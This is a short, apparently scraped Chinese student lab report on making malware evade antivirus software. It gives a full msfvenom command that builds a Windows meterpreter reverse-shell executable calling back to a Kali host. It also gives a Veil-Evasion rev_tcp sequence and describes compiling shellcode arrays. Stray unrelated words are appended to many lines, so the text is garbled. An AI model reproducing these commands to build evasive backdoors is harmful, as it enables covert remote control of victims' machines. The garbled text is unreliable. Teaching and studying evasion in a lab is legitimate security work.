(1)理解免杀技术原理
(2)正确使用msf编码器,veil-evasion,本身利用shellcode编程等免杀工具或技巧;
(成功实现了免杀的。如何作成功的简单语言描述便可,不要截图、指令。与杀软共生的结果验证要截图。)
(3)经过组合应用各类技术实现恶意代码免杀
(4)用另外一电脑实测,在杀软开启的状况下,可运行并回连成功,注明电脑的杀软名称与版本html
(1)杀软是如何检测出恶意代码的?python
还须要社会工程学的相关知识,来获取靶机的权限和相关信息。shell
msfvenom直接生成meterpreter可执行文件
得到Windows与Kali的IP地址
使用命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.192.169 PORT=5312 -f exe > Aquarius5312.exe
用ncat将文件传输到windows,检测:
Msfvenom使用编码器生成meterpreter可执行文件
用ncat将文件传输到windows,并检测:
Veil-Evasion生成可执行文件
直接输入veil-evasion打开软件
在menu里面输入如下命令来生成可执行文件:编程
use python/meterpreter/rev_tcp set LHOST 192.168.1.111 generate 5303test 1
生成一个c语言格式的Shellcode数组
而后用这个数组来编写程序,因为本身电脑上没相应程序,因此用其余同窗电脑上编写再拷回来
监听后才打开的程序,在检测的时候弹出来警告.
5.遇到的问题与解决过程windows
[利用msfvenom生成木马程序](https://www.i0day.com/1173.html)数组